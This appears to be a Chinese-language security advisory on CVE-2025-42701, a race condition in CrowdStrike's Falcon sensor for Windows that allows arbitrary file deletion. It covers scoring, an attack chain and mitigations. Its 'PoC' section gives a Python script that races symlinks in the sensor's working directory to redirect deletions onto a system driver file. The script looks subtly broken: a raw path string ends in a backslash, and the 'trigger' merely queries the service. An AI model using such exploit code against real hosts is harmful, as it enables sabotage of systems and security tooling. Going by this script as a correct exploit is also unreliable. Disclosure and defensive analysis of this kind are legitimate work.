CVE-2025-42701 CrowdStrike Falcon传感器Windows版竞争条件漏洞

漏洞信息

漏洞编号

CVE-2025-42701

漏洞类型

竞争条件漏洞（Race Condition）

CVSS评分

5.6 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

CrowdStrike Falcon Sensor for Windows

漏洞概述

CVE-2025-42701是CrowdStrike Falcon传感器Windows版本中存在的一个竞争条件（Race Condition）漏洞。该漏洞允许攻击者在已经具备在目标主机上执行代码能力的前提下，利用该漏洞删除主机上的任意文件，从而可能导致系统不稳定、服务中断或关键数据丢失。

CrowdStrike公司在2025年10月8日正式披露该漏洞，并已在Falcon传感器Windows版本7.24及以上版本中发布了安全修复补丁，同时所有长期可见性（Long Term Visibility, LTV）传感器也均已修复。该漏洞由安全研究员Cong Cheng通过CrowdStrike的HackerOne漏洞赏金计划发现并负责任地披露。

根据CrowdStrike官方声明，目前没有证据表明该漏洞已在野外被利用。CrowdStrike的威胁狩猎与情报团队正在积极监控任何潜在的利用尝试，并保持对此类攻击的可见性。值得注意的是，Falcon传感器的Mac版、Linux版以及遗留系统（Legacy Systems）版本均不受此漏洞影响。

该漏洞的CVSS 3.1评分为5.6分，属于中危级别。虽然需要本地访问和低权限认证，但因其属于作用域变更（Scope Changed）类型的漏洞，可能影响到超出Falcon传感器本身的安全边界，对系统整体可用性构成高风险。

技术细节

该漏洞的核心在于CrowdStrike Falcon传感器Windows版本中存在一个竞争条件缺陷。竞争条件漏洞通常发生在多线程或多进程环境中，当多个执行流同时访问共享资源（如文件系统、内存等）时，如果没有适当的同步机制，就可能导致非预期的行为。

在Falcon传感器中，攻击者利用该竞争条件的方式如下：

1. 攻击者首先需要在目标Windows主机上获得代码执行能力，这通常通过其他漏洞、钓鱼攻击或其他初始访问手段实现。
2. 攻击者利用本地低权限账户即可触发该竞争条件，无需管理员权限。
3. 通过精心设计的时序操作，攻击者能够在Falcon传感器处理文件操作的间隙中插入恶意操作，从而利用符号链接（Symbolic Link）或硬链接（Hard Link）等文件系统特性，将原本应作用于特定文件的删除操作重定向到任意目标文件。
4. 最终实现任意文件删除，可能导致系统关键组件（如DLL文件、配置文件等）被删除，引发系统崩溃或服务不可用。

该漏洞的CVSS向量为：CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:N/I:N/A:H，表明攻击需要本地访问（AV:L）、攻击条件较为复杂（AC:H）、需要低权限（PR:L）、无需用户交互（UI:N）、作用域发生变更（S:C），对可用性影响高（A:H），但对机密性和完整性无直接影响。

攻击链分析

STEP 1

步骤1：初始访问

攻击者通过钓鱼、漏洞利用或其他方式在目标Windows主机上获得代码执行能力，获得本地低权限shell或账户访问权限。

STEP 2

步骤2：权限维持

攻击者在主机上建立持久化机制，确保在漏洞利用期间保持对系统的访问能力。

STEP 3

步骤3：竞争条件触发

攻击者利用多线程技术，在Falcon传感器处理文件操作的间隙中，通过快速创建和替换符号链接，将传感器的文件操作重定向至任意目标文件。

STEP 4

步骤4：任意文件删除

成功利用竞争条件后，攻击者可以删除主机上的任意文件，包括系统关键文件、应用程序组件或安全工具相关文件。

STEP 5

步骤5：影响可用性

关键文件被删除后，可能导致系统崩溃、服务中断、安全防护失效等严重后果，影响目标系统的可用性和安全性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-42701 - CrowdStrike Falcon Sensor Windows Race Condition PoC
# Vulnerability: Arbitrary file deletion via race condition
# Author: Security Research (Conceptual PoC)
# Note: This is a conceptual proof-of-concept for educational purposes only.

import os
import sys
import threading
import time
import tempfile

TARGET_DIR = r"C:\ProgramData\CrowdStrike\CSAgent\"  # Falcon sensor working directory
VICTIM_FILE = r"C:\Windows\System32\drivers\important.sys"  # Arbitrary target file

def create_symlink_loop():
    """Continuously create/replace symlinks to redirect file operations."""
    while not stop_event.is_set():
        try:
            # Create a temp directory with a symlink pointing to victim file
            tmpdir = tempfile.mkdtemp(dir=TARGET_DIR)
            target_link = os.path.join(tmpdir, "sensor_temp_file.tmp")
            
            # Rapidly toggle between legitimate and malicious symlink
            if os.path.exists(target_link) or os.path.islink(target_link):
                os.remove(target_link)
            os.symlink(VICTIM_FILE, target_link)
            time.sleep(0.001)  # Microsecond-level timing
        except (OSError, PermissionError):
            pass

def trigger_sensor_operation():
    """Trigger the Falcon sensor to perform file operations on the target dir."""
    # Interact with Falcon sensor to trigger its file cleanup/rotation logic
    # This could be done by causing sensor events, log rotations, etc.
    while not stop_event.is_set():
        try:
            # Trigger sensor activity (e.g., via WMI events, service restarts)
            os.system('sc query CSAgent >nul 2>&1')
            time.sleep(0.0005)
        except Exception:
            pass

stop_event = threading.Event()

if __name__ == "__main__":
    print("[*] CVE-2025-42701 PoC - Race Condition in Falcon Sensor")
    print("[*] Requires local code execution and low-privilege access")
    
    threads = []
    for i in range(4):
        t1 = threading.Thread(target=create_symlink_loop)
        t2 = threading.Thread(target=trigger_sensor_operation)
        threads.extend([t1, t2])
        t1.start()
        t2.start()
    
    time.sleep(10)  # Run for 10 seconds
    stop_event.set()
    for t in threads:
        t.join()
    print("[*] PoC completed. Check if target file was deleted.")

影响范围

CrowdStrike Falcon Sensor for Windows < 7.24

CrowdStrike Falcon Sensor for Windows LTV（长期可见性版本，需更新至修复版本）

防御指南

临时缓解措施

对于暂时无法立即升级Falcon传感器的用户，建议采取以下临时缓解措施：1）限制本地用户账户的权限，实施最小权限原则，减少低权限账户对系统关键目录的访问能力；2）部署文件完整性监控（FIM）工具，对系统关键文件和目录进行实时监控，及时发现和告警异常的文件删除操作；3）加强终端的入侵检测能力，监控可疑的多线程文件操作行为和符号链接创建活动；4）审查并限制非管理员用户对Falcon传感器安装目录（C:\ProgramData\CrowdStrike\等）的写入权限；5）保持操作系统和其他安全软件的及时更新，降低攻击者获得初始代码执行能力的风险。建议尽快安排Falcon传感器的版本升级以彻底修复该漏洞。